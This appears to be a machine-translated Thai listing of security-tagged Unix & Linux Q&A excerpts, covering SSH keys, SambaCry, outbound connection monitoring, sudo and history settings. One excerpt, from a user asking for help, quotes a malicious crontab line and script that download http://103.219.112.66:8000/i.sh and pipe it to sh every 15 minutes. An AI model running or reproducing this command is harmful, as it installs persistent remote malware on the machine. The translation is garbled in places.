คำถามติดแท็ก security

เนื้อหาที่เกี่ยวข้องกับความปลอดภัยของคอมพิวเตอร์เช่นเนื้อหาเกี่ยวกับนโยบายกลไกและอื่น ๆ ที่จำเป็นต้องแน่ใจว่าข้อมูลไม่รั่วไหลหรือเกิดความเสียหายและบริการต่างๆในทุกสถานการณ์

3
ผู้ดูแลเซิร์ฟเวอร์ส่งรหัสส่วนตัวให้ฉันใช้ ทำไม?
ฉันควรจะเข้าถึงเซิร์ฟเวอร์เพื่อเชื่อมโยงเซิร์ฟเวอร์ชั่วคราวและเซิร์ฟเวอร์สดเข้ากับการปรับใช้ของเรา ผู้ดูแลระบบทางด้านข้างของพวกเขาตั้งค่าอินสแตนซ์ที่สองและสร้างผู้ใช้บนเซิร์ฟเวอร์สำหรับเราเพื่อ SSH ในเป็น เท่านี้ฉันชินกับ ในใจของฉันตอนนี้สิ่งที่จะเกิดขึ้นคือฉันจะส่งกุญแจสาธารณะของพวกเขาซึ่งสามารถวางไว้ในโฟลเดอร์กุญแจที่ได้รับอนุญาต แต่พวกเขาส่งชื่อไฟล์ให้ฉันid_rsaซึ่งมีไฟล์-----BEGIN RSA PRIVATE KEY-----อยู่ในอีเมล เป็นเรื่องปกติหรือไม่ ฉันมองไปรอบ ๆ และสามารถค้นหาทรัพยากรมากมายในการสร้างและตั้งค่าคีย์ของฉันเองตั้งแต่ต้น แต่ไม่มีอะไรเกี่ยวกับการเริ่มต้นจากไพรเวตคีย์ของเซิร์ฟเวอร์ ฉันควรใช้สิ่งนี้เพื่อสร้างกุญแจสำหรับตัวเองหรือ? ฉันจะขอให้ผู้ดูแลระบบโดยตรง แต่ไม่ต้องการที่จะปรากฏคนงี่เง่าและเสียทุกคนในระหว่างเวลาของเรา ฉันควรเพิกเฉยกุญแจที่เขาส่งมาให้ฉันและขอให้พวกเขาใส่กุญแจสาธารณะของฉันไว้ในโฟลเดอร์ที่ได้รับอนุญาตหรือไม่

2
“ WannaCry” บนระบบ Linux: คุณจะปกป้องตัวเองได้อย่างไร
จากบทความของ quick7 ระบุว่ามีบางรุ่นที่มีช่องโหว่ของSamba ที่อนุญาตให้เรียกใช้โค้ดจากระยะไกลบนระบบ Linux: ในขณะที่WannaCry ransomworm ส่งผลกระทบต่อระบบ Windows และสามารถระบุได้อย่างง่ายดายด้วยขั้นตอนการแก้ไขที่ชัดเจนช่องโหว่Sambaจะส่งผลกระทบต่อระบบ Linux และ Unix และอาจมีอุปสรรคทางเทคนิคที่สำคัญในการรับหรือปรับใช้การแก้ไขที่เหมาะสม CVE-2017-7494 Samba ทุกรุ่นตั้งแต่ 3.5.0 เป็นต้นไปมีความเสี่ยงต่อความเสี่ยงในการเรียกใช้โค้ดจากระยะไกลทำให้ไคลเอนต์ประสงค์ร้ายสามารถอัพโหลดไลบรารี่ที่แชร์ไปยังการแชร์ที่เขียนได้จากนั้นทำให้เซิร์ฟเวอร์โหลดและดำเนินการ สถานการณ์การโจมตีที่เป็นไปได้: เริ่มจากปัจจัยสองประการ: ช่องโหว่ Samba ยังไม่ได้รับการแก้ไขในระบบ Linux บางตัว มีช่องโหว่การเพิ่มระดับสิทธิพิเศษที่ไม่ได้รับการแก้ไขบนเคอร์เนล Linux บางเวอร์ชัน (ตัวอย่างเช่น CVE-2017-7308 บนเคอร์เนล Ubuntu 4.8.0-41-generic) ผู้โจมตีสามารถเข้าถึงเครื่อง Linux และยกระดับสิทธิพิเศษในการใช้ประโยชน์จากช่องโหว่ในท้องถิ่นเพื่อให้เข้าถึงรากและติดตั้ง ramsomware ในอนาคตได้คล้ายกับจำลองนี้ขึ้น WannaCry ransomware สำหรับลินุกซ์ ปรับปรุง บทความใหม่ล่าสุด"คำเตือน! แฮกเกอร์เริ่มใช้" SambaCry Flaw "เพื่อแฮ็กระบบ Linux"สาธิตวิธีการใช้ข้อบกพร่อง Sambacry …

7
ฉันจะตรวจสอบคำขอ / การเชื่อมต่อขาออกทั้งหมดจากเครื่องของฉันได้อย่างไร
เครื่องของฉันเป็นเซิร์ฟเวอร์ดังนั้นฉันจึงต้องการละเว้นการเชื่อมต่อกับเซิร์ฟเวอร์ของฉัน (เช่นเมื่อมีคนเยี่ยมชมเว็บไซต์ของฉัน) ฉันต้องการเห็นเฉพาะการเชื่อมต่อ / คำขอที่เซิร์ฟเวอร์ของฉันทำกับสถานที่อื่น ฉันจะเห็นเฉพาะการเชื่อมต่อขาออกเหล่านั้นได้อย่างไร แก้ไข: ฉันใหม่กับสิ่งเหล่านี้ สิ่งที่ฉันพยายามทำคือดูว่ามีอะไรที่ส่งจากเซิร์ฟเวอร์ของฉันถูกส่งออกไปนอกเหนือจากข้อมูลสำหรับแอปพลิเคชันบนเว็บของฉัน ตัวอย่างเช่นหากมีคนเยี่ยมชมเว็บไซต์ของฉันแน่นอนเซิร์ฟเวอร์ของฉันจะส่งข้อมูลไปยังเบราว์เซอร์ของลูกค้า แต่สมมติว่ามีโค้ดอยู่ในกรอบของแอพพลิเคชั่นเว็บของฉันที่ส่งข้อมูลทางสถิติไปยังที่อื่นที่ฉันไม่ทราบ ฉันต้องการดูที่ที่เซิร์ฟเวอร์ของฉันกำลังส่งข้อมูลไปให้ถ้ามี อาจไม่น่าเป็นไปได้ แต่สมมติว่าคุณตัดสินใจใช้ php หรือ nodejs framework ที่คุณไม่ได้เขียน: มีโอกาสเล็กน้อยที่มันอาจส่งข้อมูลบางประเภท ถ้าอย่างนั้นนั่นคือสิ่งที่ฉันอยากเห็น

3
curl ป้องกันรหัสผ่านไม่ให้ปรากฏในเอาต์พุต ps ได้อย่างไร
ฉันสังเกตเห็นเมื่อไม่นานมานี้ว่าชื่อผู้ใช้และรหัสผ่านที่กำหนดให้curlเป็นอาร์กิวเมนต์บรรทัดคำสั่งไม่ปรากฏในpsผลลัพธ์ (แม้ว่าแน่นอนว่าพวกเขาอาจปรากฏในประวัติทุบตีของคุณ) /proc/PID/cmdlineเขาก็จะไม่ปรากฏใน (ความยาวของอาร์กิวเมนต์ชื่อผู้ใช้ / รหัสผ่านรวมกันสามารถได้รับแม้ว่า) การสาธิตด้านล่าง: [root@localhost ~]# nc -l 80 & [1] 3342 [root@localhost ~]# curl -u iamsam:samiam localhost & [2] 3343 [root@localhost ~]# GET / HTTP/1.1 Authorization: Basic aWFtc2FtOnNhbWlhbQ== User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 Host: localhost Accept: */* [1]+ Stopped nc -l 80 [root@localhost …

18
การเข้าถึงรูทที่ไม่สามารถเปลี่ยนรหัสผ่านรูตได้
เรากำลังมีปัญหาเล็กน้อยบนเซิร์ฟเวอร์ เราต้องการให้ผู้ใช้บางคนสามารถทำได้เช่นsudoและกลายเป็นรูท แต่ด้วยข้อ จำกัด ที่ผู้ใช้ไม่สามารถเปลี่ยนรหัสผ่านรูทได้ นั่นคือการรับประกันว่าเรายังสามารถเข้าสู่เซิร์ฟเวอร์นั้นและกลายเป็นรูทไม่ว่าผู้ใช้รายอื่นจะทำอะไร เป็นไปได้ไหม
66 ubuntu  security  sudo 

4
มีวิธีใดที่จะป้องกันไม่ให้มีการเพิ่มคำสั่งในประวัติของคุณหรือไม่?
มีวิธีใดที่จะป้องกันไม่ให้มีการเพิ่มคำสั่งในประวัติของคุณหรือไม่? ฉันมีคำสั่งที่ฉันต้องการให้ออกจากไฟล์ประวัติของฉันและฉันไม่สนใจที่จะมีมันเมื่อฉันค้นหาประวัติที่เก็บไว้ในหน่วยความจำแม้ว่ามันจะน้อยกว่าความกังวล มีวิธีการป้องกันหรือไม่ฉันต้องย้อนกลับและแก้ไขไฟล์ประวัติของฉัน ปรับปรุง:ฉันไม่ได้ตระหนักว่านี่อาจเป็นแบบเฉพาะเชลล์ zshเปลือกของฉันคือ คุณยินดีที่จะตอบสำหรับเชลล์อื่น ๆ เพื่อให้ผู้คนรู้วิธีทำสิ่งนี้ในเชลล์ของพวกเขา

2
ปลอดภัยหรือไม่ที่จะให้กุญแจสาธารณะ SSH ของฉันสำหรับการทำงาน?
ขณะนี้ฉันทำงานจากระยะไกลสำหรับองค์กรจำนวนมากที่ต้องการให้ฉันเข้าถึงเซิร์ฟเวอร์ของพวกเขาเป็นประจำเพื่อการบำรุงรักษาและอัปเกรด ฉันจะเพิ่มคีย์ SSH สาธารณะของ RSA ลงใน.ssh/authorized_keysไฟล์ได้อย่างปลอดภัยหรือไม่เพื่อให้ฉันสามารถเข้าสู่ระบบได้เร็วขึ้น / ไม่ต้องค้นหารหัสผ่าน? ฉันทำงานภายใต้ข้อสันนิษฐานว่าเป็นไปไม่ได้ที่จะสร้างรหัสส่วนตัวจากกุญแจสาธารณะ แต่ฉันถูกต้องในสมมติฐานของฉันหรือไม่ การก้าวไปอีกขั้นหนึ่งจะมีความเสี่ยงด้านความปลอดภัยใด ๆ ในการโพสต์เนื้อหาของกุญแจสาธารณะ RSA ของฉันไปยังอินเทอร์เน็ตหรือไม่? ฉันรู้ว่าหากได้รับรหัสส่วนตัวของฉันฉันมีปัญหามากมาย แต่นอกเหนือจากนั้นจะมีภัยคุกคามความปลอดภัยที่เป็นไปได้จริงหรือไม่

4
การย้าย / var, / home ไปยังพาร์ติชันแยกกัน
ฉันพยายามย้ายบางโฟลเดอร์ (เช่น/varและ/home) ไปยังพาร์ติชันแยกต่างหากหลังจากอ่านคู่มือนี้: 3.2.1 เลือกโครงร่างพาร์ติชันที่ชาญฉลาด ฉันก็สามารถที่จะย้ายโฟลเดอร์หนึ่งที่ประสบความสำเร็จต่อไปนี้คู่มือ อย่างไรก็ตามดูเหมือนจะใช้งานไม่ได้กับหลาย ๆ โฟลเดอร์และโฟลเดอร์ทั้งหมดของฉันถูกเทลงในพาร์ติชั่นโดยไม่มีโฟลเดอร์ที่เหมาะสม ผมอยากจะติด/var, /homeและ/tmpบนพาร์ติชันที่แยกเป็นสัดส่วน ใครสามารถแนะนำฉันเกี่ยวกับเรื่องนี้?

2
รายการ crontab ที่น่าสงสัยที่เรียกใช้ 'xribfa4' ทุก 15 นาที
ฉันต้องการเพิ่มบางอย่างลงในไฟล์ root crontab ของฉันใน Raspberry Pi ของฉันและพบรายการที่น่าสงสัยสำหรับฉันการค้นหาบางส่วนของมันบน Google ไม่ได้ทำอะไรเลย รายการ Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh เนื้อหาของhttp://103.219.112.66:8000/i.shคือ: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) …
58 security  cron  malware 

2
ตัวเลือก Chromium `- no-sandbox 'หมายถึงอะไร?
ฉันกำลังเรียกใช้ Chromium ดังนี้: chromium --no-sandbox ฉันกำลังทำสิ่งนี้เพราะฉันใช้ Debian Squeeze บน OpenVZ VM Container และเป็นวิธีเดียวที่ฉันจะทำให้มันทำงานได้ แม้ว่าฉันจะอ่านต่อไปนี้มันแย่มาก แต่ฉันอยากรู้ว่าทำไม มีใครช่วยอธิบายให้ฉันฟังหน่อยได้ไหม? มีใครบางคนต้องการแฮ็คเข้าสู่คอมพิวเตอร์ของคุณเพื่อทำความเสียหาย หรือช่องโหว่นั้นมาจากไฟล์บนเว็บเช่นไฟล์ JavaScript หรือไม่ ถ้าฉันล็อคการสืบค้นไปยังไซต์ "เชื่อถือ" เพียงไม่กี่แห่ง (Gmail, stackexchange (ofcourse) และ facebook)

1
ทำไม 1024 พอร์ตแรกที่ จำกัด เฉพาะผู้ใช้รูทเท่านั้น?
นี่เป็นความอยากรู้ที่ไม่ได้ใช้งานมากกว่าสิ่งอื่นใด เพื่อนของฉันคนหนึ่งถามฉันว่า 'ช่วงพอร์ตใดที่รูทเดียวที่สามารถใช้งานได้ใน Linux' ฉันบอกเขาว่า 0-1024 ถูก จำกัด จากนั้นเขาก็ถามฉันว่าทำไมมันถึงเป็นเช่นนั้นและ ... ฉันตกอยู่ในความสูญเสีย ไม่มีความคิดใด ๆ มีเหตุผลว่าทำไมพอร์ตเหล่านี้ถูก จำกัด และ 1025-65535 ไม่? บริการเครือข่ายที่สำคัญที่สุด (HTTP, FTP, SSH, Telnet, HTTPS, POP, SMTP, ฯลฯ ) อยู่ในช่วงนี้ดังนั้นคำตอบที่เป็นไปได้ฉันคิดว่า: ผู้ใช้ที่ไม่น่าเชื่อถือสามารถเรียกใช้โปรแกรมที่ฟังพอร์ตเหล่านี้เพื่อดูรายละเอียดการเข้าสู่ระบบ ผู้ใช้ที่ไม่น่าเชื่อถือสามารถเรียกใช้แอปพลิเคชันเซิร์ฟเวอร์ที่ไม่ได้รับอนุญาต ทุกคนสามารถหลั่งน้ำตาแสงที่นี่?

5
Mutt: วิธีการเก็บรหัสผ่านอย่างปลอดภัย?
ไฟล์. mtrtrc ของฉันดูเหมือนไฟล์นี้หรือดูด้านล่าง ฉันลังเลกับรหัสผ่าน ฉันจะเก็บรหัสผ่านของฉันไว้ใช้muttอย่างไร set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
52 security  mutt 

3
แปลง Amazon .pem key เป็น Putty .ppk key Linux
ฉันสร้างและดาวน์โหลด.pemรหัสส่วนตัวจาก AWS แล้ว อย่างไรก็ตามในการใช้งาน Putty เพื่อเชื่อมต่อกับเครื่องเสมือนฉันต้องมีรหัสนั้นใน.ppkรูปแบบ กระบวนการของการแปลงมีรายละเอียดในประมาณ 20 บรรทัดที่นี่: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty ฉันใช้ Linux Mint (Ubuntu distro) และฉันรู้ว่าฉันสามารถใช้ puttygen ในเทอร์มินัล อย่างไรก็ตามฉันไม่ทราบวิธีใช้เครื่องมือนี้หรือวิธีกำหนดค่าพารามิเตอร์ที่จำเป็น เมื่อฉันพิมพ์ puttygen - ช่วยฉันได้ PuTTYgen unidentified build, Aug 7 2013 12:24:58 Usage: puttygen ( keyfile | -t type [ -b bits ] ) [ -C comment ] [ -P ] [ …

2
จะระบุกระบวนการที่ไม่มี pid ได้อย่างไร?
ฉันมีกระบวนการที่ฟัง 2 พอร์ต: 45136 / tcp และ 37208 / udp (อันที่จริงฉันถือว่าเป็นกระบวนการเดียวกัน) แต่ netstat ไม่ส่งคืน pid ใด ๆ : netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - ผลลัพธ์เดียวกันกับ "grep 37208" ฉันลองด้วยเช่นกัน: lsof -i TCP:45136 แต่มันจะไม่คืนสิ่งใดเลย มันเป็นการติดตั้งแบบใหม่ของการบีบและฉันไม่รู้จริงๆว่ากระบวนการนี้เป็นอย่างไร ความคิดใด ๆ ตอบ ขอบคุณความคิดเห็นของคุณฉันพบว่ามันคืออะไร ฉันยกเลิกการติดตั้ง nfs-server nfs-common (หลังจาก dkpg --get-selections | …

7
ฉันจะทำลายแผนผังไดเรกทอรีทั้งหมดซ้ำได้อย่างไร
ฉันมีแผนผังไดเรกทอรีที่ฉันต้องการทำลายด้วยยูทิลิตี้ 'ฉีก' ยูทิลิตี้ น่าเสียดายที่ shred ไม่มี-Rตัวเลือกสำหรับ shredding แบบเรียกซ้ำ ฉันจะทำลายแผนผังไดเรกทอรีทั้งหมดแบบวนซ้ำได้อย่างไร

โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.